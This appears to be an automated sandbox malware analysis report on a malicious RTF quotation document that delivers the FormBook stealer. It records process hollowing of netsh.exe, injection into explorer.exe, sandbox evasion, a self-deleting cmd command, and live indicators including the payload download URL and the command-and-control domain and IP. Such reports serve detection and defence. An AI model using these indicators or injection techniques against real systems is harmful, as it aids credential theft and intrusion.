Source: explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: princedan85671.exe	Binary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: explorer.exe, 00000007.00000000.2211227110.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: princedan85671.exe	Binary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe

Code function: 6_2_00409A90 rdtsc

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe

Code function: 6_2_0040ACD0 LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 6_2_00A026F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C800EA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C80080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA26F8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.anandsharmah.com
Source: C:\Windows\explorer.exe	Network Connect: 45.64.105.11 80

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 1388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1300000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 401000
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 7EFDE008

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'

Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2211182513.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Queries volume information: C:\Users\user\AppData\Roaming\princedan85671.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\princedan85671.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection812	Rootkit1	Credential API Hooking1	Security Software Discovery321	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection812	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	System Information Discovery113	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing2	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
QUOTATION1100630004R2.doc	34%	Virustotal		Browse
QUOTATION1100630004R2.doc	35%	ReversingLabs	Document-RTF.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe	24%	ReversingLabs	ByteCode-MSIL.Coinminer.BitCoinMiner
C:\Users\user\AppData\Local\Temp\princedan85671.exe	24%	ReversingLabs	ByteCode-MSIL.Coinminer.BitCoinMiner
C:\Users\user\AppData\Roaming\princedan85671.exe	24%	ReversingLabs	ByteCode-MSIL.Coinminer.BitCoinMiner

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.princedan85671.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.anandsharmah.com	1%	Virustotal		Browse
topv.xyz	6%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.google.com.br/	2%	Virustotal		Browse
http://www.google.com.br/	0%	Avira URL Cloud	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.google.com.tw/	0%	Avira URL Cloud	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://topv.xyz/princedanx.exe	100%	Avira URL Cloud	malware
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.anandsharmah.com	45.64.105.11	true	true	1%, Virustotal, Browse	unknown
www.klimareporter.com	81.88.63.46	true	false		unknown
topv.xyz	185.239.243.112	true	true	6%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://topv.xyz/princedanx.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.google.com.br/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://search.chol.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.msn.com/de-de/?ocid=iehpL	explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.com.tw/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.rediff.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000007.00000000.2203531250.0000000008632000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.sify.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
